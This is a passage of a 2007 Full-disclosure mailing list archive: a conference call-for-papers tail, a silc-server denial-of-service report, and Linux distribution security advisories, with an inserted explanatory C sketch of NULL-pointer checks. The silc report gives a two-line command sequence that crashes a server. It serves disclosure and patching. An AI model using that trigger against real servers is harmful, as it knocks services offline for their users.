=== Lecture Requirements ===

Lectures are expected to be highly relevant in practice or better be darn funny. Sales droids and PR-people have been known to disappear without traces on past events. Interactive workshops are welcome. Hands-on anything are even more welcome.

Final presentations for talks should be up to 60 minutes, for workshops up to 60 or 120 minutes long. Additionally, a question-and-answer period will be provided. Follow-up discussions and hands-on workshops are strongly encouraged, there will be space for such activities available outside the main lecture shelters (if you don't prefer a nice sit-in on the grass in the sun).

Audio and video recordings of the lectures will be published online in various formats. All material will be available under a Creative Commons licence allowing free non-commercial redistribution of the material as long as the original credit to authors and publishers is retained.

=== Submissions ===

All proposals MUST be submitted online using our lecture submission system at https://pentabarf.cccv.de/submission/Camp+2007 . Please follow the instructions given there. You can provide papers and slides for the digital conference pack upon submission. Please make sure your submission contains all information we need to review your talk and send us everything in one go.

If you have any questions regarding your submission, feel free to contact us at camp-content at cccv.de but do NOT submit your lecture via e-mail.

Accepted speakers are asked to hand in slides used in their talks. Please use a well-known format for your slides.

=== Dates and deadlines ===

The deadline for submission is May, 15th, 2007. This deadline is final. If there are remaining slots, we offer a second deadline on June, 5th. Accepted submissions between May, 15th, and June, 5th, will then be allocated to the remaining slots. Notification of acceptance will be sent out by June, 27th, or earlier. Early submissions will be treated with higher priority.
-- "I am chaos. I am the substance from which your artists and scientists build rhythms. I am the spirit with which your children and clowns laugh in happy anarchy. I am chaos. I am alive, and I tell you that you are free." Eris, Goddess Of Chaos, Discord & Confusion From a.heidenreich at blacksec.de Tue Mar 6 17:48:08 2007 From: a.heidenreich at blacksec.de (Alexander Heidenreich) Date: Tue, 6 Mar 2007 18:48:08 +0100 Subject: [Full-disclosure] silc-server 1.0.2 denial-of-service vulnerability Message-ID: <200703061848.08684.a.heidenreich@blacksec.de> Hi, there is a bug in the current version of silc-server that makes it possible to crash a networks SILC router or a standalone server, when a new channel is created. All it takes is to specify an invalid hmac algorithm name and no cipher algorithm name. This results in an null pointer dereference in 'SILC_SERVER_CMD_FUNC(join)' at line 2444 in apps/silcd/command.c. To reproduce: /connect yourserver /join nonexistent -hmac nonexistent The attached patch fixes the problem. Best regards, Frank Benkstein -- GPG (Mail): 7093 7A43 CC40 463A 5564 ?599B 88F6 D625 BE63 866F GPG (XMPP): 2243 DBBA F234 7C5A 6D71 ?3983 9F28 4D03 7110 6D51 -------------- next part -------------- A non-text attachment was scrubbed... 
Name: silc-join-hmac.patch
Type: text/x-diff
Size: 2882 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/10bbcc7f/attachment.bin

From announce-noreply at rpath.com Tue Mar 6 20:06:28 2007
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Tue, 06 Mar 2007 15:06:28 -0500
Subject: [Full-disclosure] rPSA-2007-0050-1 kernel
Message-ID: <45edc9c4.IYhEqeCF18XULrXH%announce-noreply@rpath.com>

rPath Security Advisory: 2007-0050-1
Published: 2007-03-06
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
    Local Deterministic Vulnerability
Updated Versions:
    kernel=/conary.rpath.com at rpl:devel//1/2.6.19.7-0.1-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5753
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0006
    https://issues.rpath.com/browse/RPL-1097
    https://issues.rpath.com/browse/RPL-1106

Description:
    Previous versions of the kernel package are vulnerable to multiple local user attacks. One vulnerability is a local user denial of service (system crash) due to a bug in the key_alloc_serial() function. The second vulnerability is a local user attack in which a call to the listxattr() system call on a bad inode will at least corrupt memory in the calling process, and may allow a malicious program to read protected kernel memory (information exposure, possibly enabling other vulnerabilities), crash the system, or even execute arbitrary code provided by the attacker. Bad inodes are not present on most systems, so in practice the attack will require that the user be able to mount a filesystem.
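The silc-server report above (a null pointer dereference in the join command when the client names an unknown hmac and no cipher) is an instance of a common bug class: a lookup-by-name routine returns NULL for an unknown name, and the caller uses the result as if it were always valid. The C sketch below is an added illustration of the defensive pattern, not silc-server's code and not the attached patch. The algorithm tables, key lengths, function names and status codes are all constructed for this example; the point is that an absent name selects a default, an unknown name is an error returned to the caller, and no field of the lookup result is touched until both resolutions succeeded.

```c
#include <stddef.h>
#include <string.h>

/* Constructed registry of algorithm names (illustrative; not silc-server's tables). */
struct algo {
    const char *name;
    unsigned key_len;   /* key material in bytes; illustrative values */
};

static const struct algo ciphers[] = {
    { "aes-256-cbc",     32 },
    { "twofish-256-cbc", 32 },
};

static const struct algo hmacs[] = {
    { "hmac-sha1-96", 20 },
    { "hmac-md5-96",  16 },
};

#define NELEMS(a) (sizeof(a) / sizeof((a)[0]))

/* Lookup by name. Returns NULL for an unknown (or missing) name; the bug
 * class in the report above arises when a caller forgets that NULL is a
 * possible result and dereferences it. */
static const struct algo *find_algo(const struct algo *tbl, size_t n, const char *name)
{
    if (name == NULL)
        return NULL;
    for (size_t i = 0; i < n; i++)
        if (strcmp(tbl[i].name, name) == 0)
            return &tbl[i];
    return NULL;
}

enum join_status { JOIN_OK = 0, JOIN_UNKNOWN_CIPHER = 1, JOIN_UNKNOWN_HMAC = 2 };

struct join_params {
    const struct algo *cipher;
    const struct algo *hmac;
};

/* Resolve the cipher and hmac requested for a new channel.
 * - name absent (NULL): use the server default (first table entry)
 * - name present but unknown: return an error the server reports to the
 *   client; the request is refused instead of crashing the daemon
 * On JOIN_OK both pointers in *out are non-NULL; on error *out is untouched. */
enum join_status resolve_join_algorithms(const char *cipher_name,
                                         const char *hmac_name,
                                         struct join_params *out)
{
    const struct algo *c = cipher_name
        ? find_algo(ciphers, NELEMS(ciphers), cipher_name)
        : &ciphers[0];
    if (c == NULL)
        return JOIN_UNKNOWN_CIPHER;

    const struct algo *h = hmac_name
        ? find_algo(hmacs, NELEMS(hmacs), hmac_name)
        : &hmacs[0];
    if (h == NULL)
        return JOIN_UNKNOWN_HMAC;

    out->cipher = c;
    out->hmac = h;
    return JOIN_OK;
}

/* Total key material the channel needs. Only valid after JOIN_OK, which is
 * the invariant the NULL checks above establish. */
unsigned channel_key_bytes(const struct join_params *p)
{
    return p->cipher->key_len + p->hmac->key_len;
}
```

The reproduction in the report (no cipher named, unknown hmac named) maps onto the `resolve_join_algorithms(NULL, "nonexistent", &p)` case: the cipher falls back to the default, the hmac lookup fails, and the function returns `JOIN_UNKNOWN_HMAC` without ever reaching `channel_key_bytes`.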
From vorlon at gentoo.org Tue Mar 6 20:43:22 2007
From: vorlon at gentoo.org (Matthias Geerdsen)
Date: Tue, 06 Mar 2007 21:43:22 +0100
Subject: [Full-disclosure] [ GLSA 200703-07 ] STLport: Possible remote execution of arbitrary code
Message-ID: <45EDD26A.4040903@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200703-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: STLport: Possible remote execution of arbitrary code
      Date: March 06, 2007
      Bugs: #165837
        ID: 200703-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two buffer overflows have been discovered in STLport possibly leading to the remote execution of arbitrary code.

Background
==========

STLport is a multi-platform C++ Standard Library implementation.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  dev-libs/STLport        < 5.0.3                          >= 5.0.3

Description
===========

Two buffer overflows have been discovered, one in "print floats" and one in the rope constructor.

Impact
======

Both of the buffer overflows could result in the remote execution of arbitrary code. Please note that the exploitability of the vulnerabilities depends on how the library is used by other software programs.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All STLport users should upgrade to the latest version.
    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/STLport-5.0.3"

References
==========

  [ 1 ] CVE-2007-0803
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0803

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From kees at ubuntu.com Tue Mar 6 22:01:41 2007
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 6 Mar 2007 14:01:41 -0800
Subject: [Full-disclosure] [USN-429-1] tcpdump vulnerability
Message-ID: <20070306220141.GH9621@outflux.net>

===========================================================
Ubuntu Security Notice USN-429-1             March 06, 2007
tcpdump vulnerability
CVE-2007-1218
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  tcpdump                                  3.9.1-1ubuntu1.1

Ubuntu 6.06 LTS:
  tcpdump                                  3.9.4-2ubuntu0.1

Ubuntu 6.10:
  tcpdump                                  3.9.4-4ubuntu0.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Moritz Jodeit discovered that tcpdump had an overflow in the 802.11 packet parser. Remote attackers could send specially crafted packets, crashing tcpdump, possibly leading to a denial of service.

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1.diff.gz
      Size/MD5: 12037 9086124de1072e521624979a49a41749
    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1.dsc
      Size/MD5: 672 aa2dbeff2bbc288a8d98bff3d0743d10
    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1.orig.tar.gz
      Size/MD5: 662060 5f589a34be42d335176d1b8cfcbd1f6b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1_amd64.deb
      Size/MD5: 307150 324c0c4ae58717e2e0af4c3e251c72c9

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1_i386.deb
      Size/MD5: 284880 05fcf0bd9f44a884cce9576f64593614

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1_powerpc.deb
      Size/MD5: 294816 561ba6b77837204cd6cc9e088b77fccd

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1_sparc.deb
      Size/MD5: 299920 d759b94205402352adb055af34a70ebd

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1.diff.gz
      Size/MD5: 10786 a46a8c2116b0e280127b0f4ca7f85c2b
    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1.dsc
      Size/MD5: 685 21536cc080bd4dc72fdb0635349e29cc
    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4.orig.tar.gz
      Size/MD5: 716862 4b64755bbc8ba1af49c747271a6df5b8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1_amd64.deb
      Size/MD5: 312992 92e764c3084d0e9ed236afa956755fef

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1_i386.deb
      Size/MD5: 289554 83a973219fcc4cb4edb27cb1c820666b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1_powerpc.deb
      Size/MD5: 301108 e810b1f74b8e8722cc81aa7bcf0ca64c

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1_sparc.deb
      Size/MD5: 304888 59349548d64f1b8bb8b79018754bdf0d

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1.diff.gz
      Size/MD5: 10919 0fbd287a08757cfa3a9c52f12d8147e3
    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1.dsc
      Size/MD5: 632 283ba6bae274162eb64aa8039ebd4062
    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4.orig.tar.gz
      Size/MD5: 716862 4b64755bbc8ba1af49c747271a6df5b8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1_amd64.deb
      Size/MD5: 314924 5aa45e116446876b771524b6631ab3a8

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1_i386.deb
      Size/MD5: 300618 de0caa6ea55db70547fa1cec2fd0056e

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1_powerpc.deb
      Size/MD5: 303532 1c5dd389b720a339df581dd277d63d84

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1_sparc.deb
      Size/MD5: 308412 9c27ed7d8f42e0790902a985e687e5e1

From kees at ubuntu.com Tue Mar 6 22:05:34 2007
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 6 Mar 2007 14:05:34 -0800
Subject: [Full-disclosure] [USN-430-1] mod_python vulnerability
Message-ID: <20070306220534.GI9621@outflux.net>

===========================================================
Ubuntu Security Notice USN-430-1             March 06, 2007
libapache2-mod-python vulnerability
CVE-2004-2680
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  libapache2-mod-python                    3.1.3-3ubuntu1.1

Ubuntu 6.06 LTS:
  libapache2-mod-python                    3.1.4-0ubuntu1.1

After a standard system upgrade you need to restart Apache to effect the necessary changes.

Details follow:

Miles Egan discovered that mod_python, when used in output filter mode, did not handle output larger than 16384 bytes, and would display freed memory, possibly disclosing private data. Thanks to Jim Garrison of the Software Freedom Law Center for identifying the original bug as a security vulnerability.
Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.3-3ubuntu1.1.diff.gz
      Size/MD5: 42855 1529fea7b05b869a360b6bc68d52386e
    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.3-3ubuntu1.1.dsc
      Size/MD5: 810 63072c8e787515557969a57119e5d4c5
    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.3.orig.tar.gz
      Size/MD5: 293548 2e1983e35edd428f308b0dfeb1c23bfe

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python-doc_3.1.3-3ubuntu1.1_all.deb
      Size/MD5: 101052 02819855dfc2346b9582b8687b7ce3f3
    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.3-3ubuntu1.1_all.deb
      Size/MD5: 12890 29d8f3ad95844a81ef2bac9921be4ea2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/universe/liba/libapache2-mod-python/libapache2-mod-python2.3_3.1.3-3ubuntu1.1_amd64.deb
      Size/MD5: 88482 bbbc44abd50a165ae5df51d97c8b59f4
    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.3-3ubuntu1.1_amd64.deb
      Size/MD5: 88506 33430412a637252533673023a0eb556e

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/universe/liba/libapache2-mod-python/libapache2-mod-python2.3_3.1.3-3ubuntu1.1_i386.deb
      Size/MD5: 80692 43cf25dacf95697200b50280ff4b1c74
    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.3-3ubuntu1.1_i386.deb
      Size/MD5: 80722 7003abb20896ed3d218febd92ad176c2

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/universe/liba/libapache2-mod-python/libapache2-mod-python2.3_3.1.3-3ubuntu1.1_powerpc.deb
      Size/MD5: 85980 75be899b0568d8a332ac04ae820d955e
    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.3-3ubuntu1.1_powerpc.deb
      Size/MD5: 86010 f706350855b692417a9d32f2c1962abd

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/universe/liba/libapache2-mod-python/libapache2-mod-python2.3_3.1.3-3ubuntu1.1_sparc.deb
      Size/MD5: 82038 0b8d6e081d3e6506139a9fac4674d8ad
    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.3-3ubuntu1.1_sparc.deb
      Size/MD5: 82078 71b5c528867eb166cd140a564d3fde0b

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.4-0ubuntu1.1.diff.gz
      Size/MD5: 25348 f53b1e046220df8e1cdcf4cd602ac563
    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.4-0ubuntu1.1.dsc
      Size/MD5: 769 41f6be106885d14e487317c57cc8e940
    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.4.orig.tar.gz
      Size/MD5: 308510 607175958137b06bcda91110414c82a1

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python-doc_3.1.4-0ubuntu1.1_all.deb
      Size/MD5: 113106 0b66fc0e0a15cbc6a57df85100e3ca62
    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.4-0ubuntu1.1_all.deb
      Size/MD5: 13076 5488f0a55a436648c587e9a300d63881

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.4-0ubuntu1.1_amd64.deb
      Size/MD5: 88678 8542060889c4b3c32a6937070911bf33

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.4-0ubuntu1.1_i386.deb
      Size/MD5: 80676 13f3b9e1d7260ad8c34f7597954ed315

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.4-0ubuntu1.1_powerpc.deb
      Size/MD5: 85840 684789cb3c7acbeed9064200554d8da4

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.4-0ubuntu1.1_sparc.deb
      Size/MD5: 82000 297ab56501345f12ee9c6c0951287980

From jmm at debian.org Tue Mar 6 22:33:56 2007
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Tue, 6 Mar 2007 23:33:56 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1263-1] New clamav packages fix denial of service
Message-ID: <20070306223355.GA4090@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1263-1                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
March 6th, 2006                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : clamav
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2007-0897 CVE-2007-0898
Debian Bug     : 411118

Several remote vulnerabilities have been discovered in the Clam anti-virus toolkit, which may lead to denial of service. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-0897

    It was discovered that malformed CAB archives may exhaust file descriptors, which allows denial of service.

CVE-2007-0898

    It was discovered that a directory traversal vulnerability in the MIME header parser may lead to denial of service.

For the stable distribution (sarge) these problems have been fixed in version 0.84-2.sarge.15.
For the upcoming stable distribution (etch) these problems have been fixed in version 0.88.7-2.

For the unstable distribution (sid) these problems have been fixed in version 0.90-1.

We recommend that you upgrade your clamav packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15.dsc
      Size/MD5 checksum: 874 164ac3671dc1ede72f116703ff47f5c7
    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15.diff.gz
      Size/MD5 checksum: 181092 4cb9909ef8d4d1da088a44a40a3d0a5d
    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84.orig.tar.gz
      Size/MD5 checksum: 4006624 c43213da01d510faf117daa9a4d5326c

  Architecture independent components:

    http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.84-2.sarge.15_all.deb
      Size/MD5 checksum: 155290 d03243c2e40548b1ed8a7187dbbe05c0
    http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.84-2.sarge.15_all.deb
      Size/MD5 checksum: 690908 6a35ca9ba3a2cccafe60ee6ba15dff30
    http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.84-2.sarge.15_all.deb
      Size/MD5 checksum: 124274 50a76314d37beaa54c9939d01268a295

  Alpha architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_alpha.deb
      Size/MD5 checksum: 74852 2f8ba776b5b8ecabb5ced89124df8711
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_alpha.deb
      Size/MD5 checksum: 48910 3c1e853f2c6cd9e75c1f88f9e607196c
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_alpha.deb
      Size/MD5 checksum: 2176498 f00a4e4a4724e7c278b356f74dcd6e9f
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_alpha.deb
      Size/MD5 checksum: 42160 1632e0df7ee729b9863ddd3deb70f57c
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_alpha.deb
      Size/MD5 checksum: 256108 8cd276b750093c23907973a9d3e80031
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_alpha.deb
      Size/MD5 checksum: 286304 85f2cd7418bb2bae13615499b52211fe

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_amd64.deb
      Size/MD5 checksum: 69010 5c1285590a4068fe6253145862a4ade9
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_amd64.deb
      Size/MD5 checksum: 44278 5b7a1bc8cd6034bbc5ea6b4af21c5adc
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_amd64.deb
      Size/MD5 checksum: 2173282 eedaa60dcb78037af56c2868aaa70a8a
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_amd64.deb
      Size/MD5 checksum: 40038 92967a280f254f2254851bed6f1dfd0f
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_amd64.deb
      Size/MD5 checksum: 176818 c76d900e5c2b6add3da38f4ef84adc2b
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_amd64.deb
      Size/MD5 checksum: 260378 b6b0304db0b1ac7306b43d854eb8a4d5

  ARM architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_arm.deb
      Size/MD5 checksum: 63970 a8146a69333876298408f196c7b6de18
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_arm.deb
      Size/MD5 checksum: 39636 f3768da7d1f98159134b0d5375585567
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_arm.deb
      Size/MD5 checksum: 2171278 b728182250c04bb804c25150a1c008bc
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_arm.deb
      Size/MD5 checksum: 37320 1dbc35eb0c07bb0b19f83f002346462c
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_arm.deb
      Size/MD5 checksum: 175142 e1a4473d761f38ea9e22aeede630d8af
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_arm.deb
      Size/MD5 checksum: 250250 5be64956ab66d665a714dd889616d8a7

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_hppa.deb
      Size/MD5 checksum: 68470 75c8d1e6c3f6d20d8955178dc1f9a74d
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_hppa.deb
      Size/MD5 checksum: 43276 23d1c8cacac81c26942fb1fc91a57756
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_hppa.deb
      Size/MD5 checksum: 2173656 13c73779b34757f034a924aa72c589f3
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_hppa.deb
      Size/MD5 checksum: 39534 cc09b2a89978af3c674d3b908bac0ce6
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_hppa.deb
      Size/MD5 checksum: 202948 cd2bd9baaf5784217111a7527c085faa
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_hppa.deb
      Size/MD5 checksum: 283994 91570ebc055a4c6542369090b9c42833

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_i386.deb
      Size/MD5 checksum: 65324 27e131c923911d74c77b081081efd53b
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_i386.deb
      Size/MD5 checksum: 40372 302701e63dd3ed03f4d6df6be0ea9fda
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_i386.deb
      Size/MD5 checksum: 2171596 4df76765279396b0c35e5f08c45ed9ba
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_i386.deb
      Size/MD5 checksum: 38044 56981cfac9af7758ee3c9bfb900312e8
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_i386.deb
      Size/MD5 checksum: 159896 ae0b9dab053b2a5e14f795298b27a4dd
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_i386.deb
      Size/MD5 checksum: 255084 dce16317d32ee0c1fa89e7b881627ae3

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_ia64.deb
      Size/MD5 checksum: 81954 38e69159641cd1a96823bca6bd9dbe65
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_ia64.deb
      Size/MD5 checksum: 55336 5c9ed951a1c11eb69c99c4b896b79b8d
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_ia64.deb
      Size/MD5 checksum: 2180266 7d15c59e8b1c8514c654deab1902aed2
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_ia64.deb
      Size/MD5 checksum: 49252 9184c9e05f4bb5d42e8d837016065946
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_ia64.deb
      Size/MD5 checksum: 252442 936bbea0fb4950db7be9bb8a01164fc3
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_ia64.deb
      Size/MD5 checksum: 318470 07a022c3616a0a1b5ddc5f6acb132b50

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_m68k.deb
      Size/MD5 checksum: 62640 6315cbb887a6e57471451c8a4d930b51
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_m68k.deb
